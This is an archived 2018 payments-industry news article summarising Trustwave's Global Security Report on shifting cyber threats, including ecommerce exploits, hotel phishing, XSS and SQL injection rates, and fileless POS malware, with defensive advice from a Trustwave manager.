A Thing
The Green SheetGreen Sheet

Monday, April 9, 2018

Trustwave data points to shifting cyber threats

As cybersecurity defenses continue to evolve, organized criminal elements seek new ways to exploit systems. After analyzing billions of logged security and compromise events across 21 countries, hundreds of hands-on data breach investigations and internal research, Trustwave Holdings Inc. released a comprehensive analysis in its 2018 Trustwave Global Security Report.

Marking the annual security study's 10th year, the 105-page report revealed fewer physical POS system attacks. Yet retail (16.7 percent of breach incidents) and payment card data (targeted in 40 percent of breaches) remain top targets for cybercriminals. "There's actually been a decline in attacks that target point-of-sale systems, which points to the maturing of security in brick-and-mortar retail shops," said Karl Sigler, Manager of Threat Intelligence at Trustwave.

The report found that ecommerce has taken up much of the slack for on-site exploits. Thirty percent of exploits studied occurred in ecommerce environments versus 20 percent for physical POS environments. Spam, representing 39.2 percent of inbound email, has dropped in recent years. As these types of attacks become less effective, exploits involving phishing and social engineering are gaining, according to Trustwave.

A section of the report addresses a type of phishing attack that has impacted a number of hotels. To initiate the attack, the hotel receives a call from the criminal indicating a problem making the reservation. The clerk is asked to open an email attachment containing reservation details and once opened the hotel computer is infected with malware. Sigler stressed the importance of being skeptical in phone and email situations, and taking steps to confirm the legitimacy of callers or senders before any action is taken.

In cases like this, security can be more of a human issue than one related to technology. "You can buy all of the security products in the world, but unless you have the people and know-how to implement them correctly, they're not going to do anything for your security profile," Sigler stated.

Targeted attacks on the rise

Alarmingly, the study found that 100 percent of web applications tested displayed at least one vulnerability; 11 was the median number detected. Analysts noted that web attacks have become more prevalent and sophisticated. A number of breaches examined in the study indicated careful preplanning on the part of criminals, who probed for weak packages and tools to exploit. Cross-site scripting (XSS) topped the list in this category, involved in 40 percent of web attack attempts identified. This was followed by SQL injection, responsible for 24 percent of web attacks attempted.

XSS attacks induce websites to execute malicious script that directly impact site visitors. "If your website is vulnerable to cross-site scripting, your website itself is not vulnerable to attack, your customers are," Sigler noted. "If I know that your website is vulnerable to cross-site scripting, I can start attacking your entire customer base, which becomes a reputation hit for the organization."

Another trend Trustwave identified is increased use of fileless POS malware, which is more difficult for antivirus protections to detect. "By embedding the malicious code directly in memory, as opposed to writing it to disk, there is a lot greater chance that they're going to get away with the attack," Sigler said.

He pointed out that to combat security issues such as this, a number of heuristic (discovery through problem solving and trial and error) anti-malware systems exist that search for abnormal behavior, as opposed to the presence of a specific file, so that malware can be detected and addressed more effectively.

For a free copy of the report, visit www2.trustwave.com/globalsecurityreport.html. end of article

Editor's Note:

The Green Sheet Inc. is now a proud affiliate of Bankcard Life, a premier community that provides industry-leading training and resources for payment professionals. Click here for more information.

Notice to readers: These are archived articles. Contact names or information may be out of date. We regret any inconvenience.

2022 2021 2020 2019 2018 2017 2016 2015 2014 2013 2012 2011 2010 2009 2008 2007
A Thing